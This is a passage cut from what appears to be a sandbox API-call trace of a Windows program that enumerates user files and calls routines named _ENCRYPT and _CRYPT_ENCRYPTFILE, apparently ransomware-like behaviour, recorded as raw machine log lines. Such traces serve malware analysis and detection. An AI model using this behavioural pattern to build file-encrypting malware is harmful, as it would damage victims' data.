cAlternateFileName="DOWNLO~1.LNK")) returned 0x7c20c0 [0037.191] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 0x7c20c0 [0037.191] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.191] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.191] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.191] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.191] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.192] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.193] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.193] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.193] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.193] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.193] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.193] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lnk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0x7c20c0 [0037.193] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0x7c20c0 [0037.194] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.194] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.194] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.194] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.194] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0_h8m557-v1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.194] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.194] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.194] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.194] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.194] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.194] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.195] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x61550420, ftLastWriteTime.dwHighDateTime=0x1d5c100, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 0x7c20c0 [0037.195] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x61550420, ftLastWriteTime.dwHighDateTime=0x1d5c100, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x0, dwReserved1=0x777648, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 0x7c20c0 [0037.195] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="557-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="57-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7-V1.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.197] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.197] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.197] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0_h8M557-V1.mp3", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x61550420, ftLastWriteTime.dwHighDateTime=0x1d5c100, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 0x7c2100 [0037.197] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.197] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.197] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.197] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.198] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.198] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.199] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.199] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.199] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.199] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.199] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.199] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.199] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.199] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.199] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0037.199] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.200] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.200] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.200] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.201] HeapFree (in: 